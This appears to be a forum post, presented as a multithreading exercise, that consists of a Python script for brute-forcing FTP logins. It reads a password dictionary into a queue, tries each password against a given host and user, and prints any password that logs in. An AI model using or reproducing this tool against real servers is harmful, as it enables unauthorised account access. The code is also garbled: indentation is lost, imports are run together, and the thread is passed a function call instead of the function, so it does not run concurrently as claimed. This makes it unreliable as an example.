多线程练习
import ftplibimport queue
from threading import Thread
# 初始化队列
q = queue.Queue()
# FTP端口
port = 21
def connect_ftp():
global q
# 从队列中获取密码
while True:
password = q.get()
# 初始化FTP服务器对象
server = ftplib.FTP()
print('尝试连接',password)
try:
# 尝试连接服务器
server.connect(host,port,timeout=5)
server.login(user,password)
except ftplib.error_perm:
# 登录失败
pass
else:
print(f'主机{host}ftp的账号{user}密码是{password}')
# 清楚队列
with q.mutex:
q.queue.clear()
q.all_tasks_done.notify_all()
q.unfinished_tasks = 0
finally:
# 通知队列任务完成
q.task_done()
if __name__ == '__main__':
import argparse
parse = argparse.ArgumentParser(description='破解ftp密码')
parse.add_argument('host',help='主机名字或者IP地址')
parse.add_argument('-u','--user',help='ftp用户名')
parse.add_argument('-p','--pass_list',help='破解字典')
parse.add_argument('-t','--threads',help='开启线程数量')
args = parse.parse_args()
# 主机IP
host = args.host
# 用户名
user = args.user
# 用户字典
pass_list = args.pass_list
# 开启线程数量
n_threads = int(args.threads)
# 从字典中获取所有密码
passwords = open(pass_list).read().split('\n')
# 将密码添加到队列
for password in passwords:
q.put(password)
for t in range(n_threads):
# 开启线程
thread = Thread(target=connect_ftp())
# 设置为后台线程
thread.daemon = True
thread.start()
# 等待队列为空
q.join()
页:
[1]